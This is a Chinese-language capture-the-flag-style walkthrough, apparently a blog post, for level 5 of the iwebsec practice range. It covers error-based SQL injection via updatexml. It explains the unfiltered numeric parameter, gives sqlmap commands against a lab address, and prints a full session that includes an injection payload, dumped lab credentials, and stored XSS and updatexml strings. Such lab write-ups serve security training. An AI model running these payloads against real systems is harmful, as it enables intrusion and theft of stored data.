iwebsec靶场 SQL注入漏洞通关笔记5- updatexml注入（报错型盲注）

系列文章目录

前言

iwebsec靶场的SQL注入漏洞的第05关updatexml注入漏洞渗透。

一、源码分析

如下所示，SQL语句与前几关一样，调用的语句为$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";很明显这是一个普通的数字型注入，并且没有对参数id做任何过滤。

不过在输出内容中可以得知仅sql查询成功时输出正确的id，用户名和密码。

不过在错误的时候却执行语句print_r(mysql_error());这个报错语句的使用意味着我们可以利用报错型函数如updatexml，extractvalue等函数进行SQL注入。

二、sqlmap注入

1.注入命令

sqlmap -u http://192.168.71.151/sqli/05.php?id=1  --current-db --dump --batch

如下所示，渗透成功

sqlmap发现可以通过4种方法进行渗透成功，这里我们可以指定方法就是error-based，这样的话渗透语句可以写为

sqlmap -u http://192.168.71.151/sqli/05.php?id=1  --current-db --dump --batch --technique E

2.完整交互过程

完整的注入交互如下所示


kali@kali:~$ sqlmap -u http://192.168.71.151/sqli/05.php?id=1  --current-db --dump --batch --technique E
        ___
       __H__                                                                                                                                                                                                                               
 ___ ___[)]_____ ___ ___  {1.5.11#stable}                                                                                                                                                                                                  
|_ -| . [,]     | .'| . |                                                                                                                                                                                                                  
|___|_  [.]_|_|_|__,|  _|                                                                                                                                                                                                                  
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                               
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 23:15:21 /2022-11-24/
 
[23:15:21] [INFO] resuming back-end DBMS 'mysql' 
[23:15:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 1776 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(1776=1776,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[23:15:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[23:15:21] [INFO] fetching current database
[23:15:21] [INFO] retrieved: 'iwebsec'
current database: 'iwebsec'
[23:15:21] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[23:15:21] [INFO] fetching current database
[23:15:21] [INFO] fetching tables for database: 'iwebsec'
[23:15:21] [INFO] retrieved: 'sqli'
[23:15:21] [INFO] retrieved: 'user'
[23:15:21] [INFO] retrieved: 'users'
[23:15:21] [INFO] retrieved: 'xss'
[23:15:21] [INFO] fetching columns for table 'users' in database 'iwebsec'
[23:15:21] [INFO] retrieved: 'username'
[23:15:21] [INFO] retrieved: 'varchar(255)'
[23:15:21] [INFO] retrieved: 'password'
[23:15:21] [INFO] retrieved: 'varchar(255)'
[23:15:21] [INFO] retrieved: 'role'
[23:15:21] [INFO] retrieved: 'varchar(255)'
[23:15:21] [INFO] fetching entries for table 'users' in database 'iwebsec'
[23:15:21] [INFO] retrieved: 'mall123mall'
[23:15:21] [INFO] retrieved: 'admin'
[23:15:21] [INFO] retrieved: 'orange'
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role  | password    | username |
+-------+-------------+----------+
| admin | mall123mall | orange   |
+-------+-------------+----------+
 
[23:15:21] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[23:15:21] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[23:15:21] [INFO] retrieved: 'id'
[23:15:21] [INFO] retrieved: 'int(11)'
[23:15:21] [INFO] retrieved: 'username'
[23:15:21] [INFO] retrieved: 'varchar(255)'
[23:15:21] [INFO] retrieved: 'password'
[23:15:21] [INFO] retrieved: 'varchar(255)'
[23:15:21] [INFO] retrieved: 'email'
[23:15:21] [INFO] retrieved: 'varchar(255)'
[23:15:21] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
[23:15:21] [INFO] retrieved: 'user1@iwebsec.com'
[23:15:21] [INFO] retrieved: '1'
[23:15:21] [INFO] retrieved: 'pass1'
[23:15:21] [INFO] retrieved: 'user1'
[23:15:21] [INFO] retrieved: 'user2@iwebsec.com'
[23:15:21] [INFO] retrieved: '2'
[23:15:21] [INFO] retrieved: 'pass2'
[23:15:21] [INFO] retrieved: 'user2'
[23:15:22] [INFO] retrieved: 'user3@iwebsec.com'
[23:15:22] [INFO] retrieved: '3'
[23:15:22] [INFO] retrieved: 'pass3'
[23:15:22] [INFO] retrieved: 'user3'
[23:15:22] [INFO] retrieved: 'user4@iwebsec.com'
[23:15:22] [INFO] retrieved: '4'
[23:15:22] [INFO] retrieved: 'admin'
[23:15:22] [INFO] retrieved: 'admin'
[23:15:22] [INFO] retrieved: '123@123.com'
[23:15:22] [INFO] retrieved: '5'
[23:15:22] [INFO] retrieved: '123'
[23:15:22] [INFO] retrieved: '123'
[23:15:22] [INFO] retrieved: '1234@123.com'
[23:15:22] [INFO] retrieved: '6'
[23:15:22] [INFO] retrieved: '123'
[23:15:22] [INFO] retrieved: 'ctfs' or updatexml(1,concat(0x7e,(version())),0)#'
[23:15:22] [INFO] retrieved: 'iwebsec02@iwebsec.com'
[23:15:22] [INFO] retrieved: '7'
[23:15:22] [INFO] retrieved: '123456'
[23:15:22] [INFO] retrieved: 'iwebsec' or updatexml(1,concat(0x7e,(version())),0)#'
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email                 | password | username                                             |
+----+-----------------------+----------+------------------------------------------------------+
| 1  | user1@iwebsec.com     | pass1    | user1                                                |
| 2  | user2@iwebsec.com     | pass2    | user2                                                |
| 3  | user3@iwebsec.com     | pass3    | user3                                                |
| 4  | user4@iwebsec.com     | admin    | admin                                                |
| 5  | 123@123.com           | 123      | 123                                                  |
| 6  | 1234@123.com          | 123      | ctfs' or updatexml(1,concat(0x7e,(version())),0)#    |
| 7  | iwebsec02@iwebsec.com | 123456   | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+
 
[23:15:22] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[23:15:22] [INFO] fetching columns for table 'user' in database 'iwebsec'
[23:15:22] [INFO] retrieved: 'id'
[23:15:22] [INFO] retrieved: 'int(11)'
[23:15:22] [INFO] retrieved: 'username'
[23:15:22] [INFO] retrieved: 'varchar(255)'
[23:15:22] [INFO] retrieved: 'password'
[23:15:22] [INFO] retrieved: 'varchar(255)'
[23:15:22] [INFO] fetching entries for table 'user' in database 'iwebsec'
[23:15:22] [INFO] retrieved: '1'
[23:15:22] [INFO] retrieved: 'pass1'
[23:15:22] [INFO] retrieved: 'user1'
[23:15:22] [INFO] retrieved: '2'
[23:15:22] [INFO] retrieved: 'pass2'
[23:15:22] [INFO] retrieved: 'user2'
[23:15:22] [INFO] retrieved: '3'
[23:15:22] [INFO] retrieved: 'pass3'
[23:15:22] [INFO] retrieved: 'user3'
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | pass1    | user1    |
| 2  | pass2    | user2    |
| 3  | pass3    | user3    |
+----+----------+----------+
 
[23:15:22] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[23:15:22] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[23:15:22] [INFO] retrieved: 'id'
[23:15:22] [INFO] retrieved: 'int(11)'
[23:15:22] [INFO] retrieved: 'name'
[23:15:22] [INFO] retrieved: 'varchar(255)'
[23:15:22] [INFO] fetching entries for table 'xss' in database 'iwebsec'
[23:15:22] [INFO] retrieved: '1'
[23:15:22] [INFO] retrieved: 'iwebsec'
[23:15:22] [INFO] retrieved: '5'
[23:15:22] [INFO] retrieved: ''
[23:15:22] [INFO] retrieved: '6'
[23:15:22] [INFO] retrieved: ''
[23:15:22] [INFO] retrieved: '7'
[23:15:22] [INFO] retrieved: ''
[23:15:22] [INFO] retrieved: '8'
[23:15:22] [INFO] retrieved: ''
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name                               |
+----+------------------------------------+
| 1  | iwebsec                            |
| 5  | <img src=1 onerror=alert(/ctfs/)/> |
| 6  | <img src=1 onerror=alert(/ctfs/)/> |
| 7  | <img src=1 onerror=alert(/ctfs/)/> |
| 8  | <?php phpinfo();?>                 |
+----+------------------------------------+
 
[23:15:22] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[23:15:22] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[23:15:22] [WARNING] your sqlmap version is outdated
 
[*] ending @ 23:15:22 /2022-11-24/

总结

通过源码再来分析下时间盲注关卡重点内容：
（1）闭合方式是什么？iwebsec的第05关关卡为数字型注入，无闭合方式
（2）注入类别是什么？这部分是报错型盲注
（3）是否过滤了关键字？很明显通过源码，iwebsec的时间报错型关卡无过滤任何信息
了解了如上信息就可以针对性进行SQL渗透。初学者还是应该以手动注入方法练习，真正了解原理后可以在使用sqlmap来提升速度。

相关阅读:
几道毒瘤微积分题
 【ICer必备基础】MOS电容——电容电压特性详解
 postgres账号授权模式授权
 2022年全国职业院校技能大赛：网络系统管理项目-模块B--Windows样题7
说说数据治理中常见的20个问题
 xxis not in the sudoers file. This incident will be reported.
力扣：300.最长递增子序列
 lambda表达式c++
Qt线程池QThreadPool的使用
 超大规模云数据中心对存储的诉求有哪些？
原文地址：https://blog.csdn.net/mooyuan/article/details/128035767